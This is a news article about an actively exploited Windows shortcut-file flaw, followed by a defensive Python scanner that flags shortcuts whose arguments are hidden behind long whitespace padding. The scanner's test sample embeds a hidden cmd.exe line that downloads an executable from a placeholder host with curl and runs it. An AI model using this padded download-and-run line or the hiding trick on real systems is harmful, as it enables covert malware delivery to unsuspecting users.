You might assume that high-risk security vulnerabilities that have been reported by expert security researchers would be fixed as quickly as possible by the affected companies, especially if those vulnerabilities are actively being exploited in the wild. That just makes sense.
Apparently not. One particular security flaw in Windows has not only existed for over eight years, but has been actively exploited ever since… and yet Microsoft refuses to fix it.
The security vulnerability, explained
The flaw in question is a zero-day vulnerability, tracked as CVE-2025-9491, in the way Windows handles LNK (shortcut) files; it has already been exploited thousands of times.
A recent blog post by researchers at Arctic Wolf brought renewed attention to the issue: they found that a hacking group has once again used CVE-2025-9491 in attacks. The targets were apparently diplomats in several European countries, with the most recent attacks hitting Belgium, Hungary, Italy, Serbia, and the Netherlands at the end of 2024.
The attack itself is relatively simple: the attackers only need to deliver a malicious shortcut file to the target device (for example, as a phishing attachment). Once the victim opens the file, it runs attacker-controlled code, which can be used for espionage, among other things.
In the latest wave of attacks, the hackers apparently tried to deploy a remote access trojan (RAT) on affected devices, giving them the ability to run a wide variety of commands. According to a report by Trend Micro, hacking groups from China, Iran, North Korea, and Russia have used this method in the past to spread malicious files.
Why isn’t Microsoft taking action?
According to the researchers, Microsoft was informed of the vulnerability through Trend Micro's Zero Day Initiative (ZDI) bug bounty program, yet it still hasn't addressed it. It's unclear why Microsoft doesn't want to, or can't, patch a high-risk flaw that is being actively exploited.
As a result, further attacks are likely. Windows administrators are therefore advised to block the execution of LNK files from unknown sources, in particular shortcuts that arrive as email attachments or downloads, until further notice.
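The scanner below is an added example; it is not code from the article, Arctic Wolf, Trend Micro or Microsoft. It backs up both the attack description above and the advice to administrators: it parses the Shell Link binary format (MS-SHLLINK) just far enough to pull out the COMMAND_LINE_ARGUMENTS field and flags shortcuts whose arguments are padded with a long run of whitespace, which is the publicly documented trick behind this flaw: the padding pushes the real command line out of view in the shortcut's Properties dialog, while Windows still executes it in full. The SUSPICIOUS_RUN threshold, the build_lnk helper and both sample shortcuts are assumptions constructed for this example; the samples carry no real payload.

```python
import re
import struct

# Layout constants from the MS-SHLLINK specification (the .lnk binary format).
HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits for the optional structures that follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
HAS_RELATIVE_PATH, HAS_ARGUMENTS = 0x08, 0x20
# StringData entries appear in this fixed order, each present only if its flag bit is set.
STRING_DATA_ORDER = (
    (0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
    (0x20, "arguments"), (0x40, "icon_location"),
)
# Whitespace characters that the padding trick uses to hide the real command line.
PAD_RUN = re.compile(r"[ \t\n\x0b\x0c\r]+")
# Assumed threshold: a legitimate shortcut almost never has 16+ consecutive
# whitespace characters in its arguments. Tune it for your environment.
SUSPICIOUS_RUN = 16


def _need(data: bytes, pos: int, n: int) -> None:
    """Refuse to read past the end of the buffer (hostile input is the norm here)."""
    if pos + n > len(data):
        raise ValueError(f"truncated shell link: need {n} bytes at offset {pos}")


def parse_lnk(data: bytes) -> dict:
    """Validate the header, skip LinkTargetIDList/LinkInfo, and return the StringData fields."""
    _need(data, 0, HEADER_SIZE)
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        _need(data, pos, 2)
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size  # IDListSize does not count its own 2 bytes
    if flags & HAS_LINK_INFO:
        _need(data, pos, 4)
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size  # LinkInfoSize does count its own 4 bytes
    fields = {"flags": flags}
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        _need(data, pos, 2)
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        _need(data, pos, count * width)
        raw = data[pos:pos + count * width]
        pos += count * width
        # ANSI strings use the system code page; cp1252 is an assumption here.
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def assess(data: bytes) -> dict:
    """Flag a shortcut whose arguments hide the real command behind a long whitespace run."""
    fields = parse_lnk(data)
    args = fields.get("arguments", "")
    longest = max((len(m) for m in PAD_RUN.findall(args)), default=0)
    return {
        "target": fields.get("relative_path", ""),
        "hidden_arguments": args.strip(),
        "longest_whitespace_run": longest,
        "suspicious": longest >= SUSPICIOUS_RUN,
    }


def assess_file(path: str) -> dict:
    """Run the same check against a shortcut on disk (e.g. from a mail quarantine)."""
    with open(path, "rb") as fh:
        return assess(fh.read())


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed test input: a minimal link carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Real shortcuts usually put the target in LinkTargetIDList, which the parser skips."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, timestamps, icon, show cmd, hotkey, reserved

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed samples (no real payload): an ordinary shortcut, and one that pushes its
# actual command line behind 300 spaces so the visible part of the Target field is blank.
BENIGN_SAMPLE = build_lnk("..\\..\\Windows\\System32\\notepad.exe", "readme.txt")
PADDED_SAMPLE = build_lnk(
    "..\\..\\Windows\\System32\\cmd.exe",
    " " * 300 + "/c curl -o %TEMP%\\u.exe http://example.invalid/u && %TEMP%\\u.exe",
)
```

Treat a hit as a reason to open the shortcut in a hex editor and look at the full argument string, not as proof of compromise on its own. The parser deliberately skips LinkTargetIDList, so the "target" it reports is only the RELATIVE_PATH string when one is present; the padded arguments are the signal that matters, and they survive regardless of how the target is encoded.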
This article was written by Nermeen Nabil Khear Abdelmalak.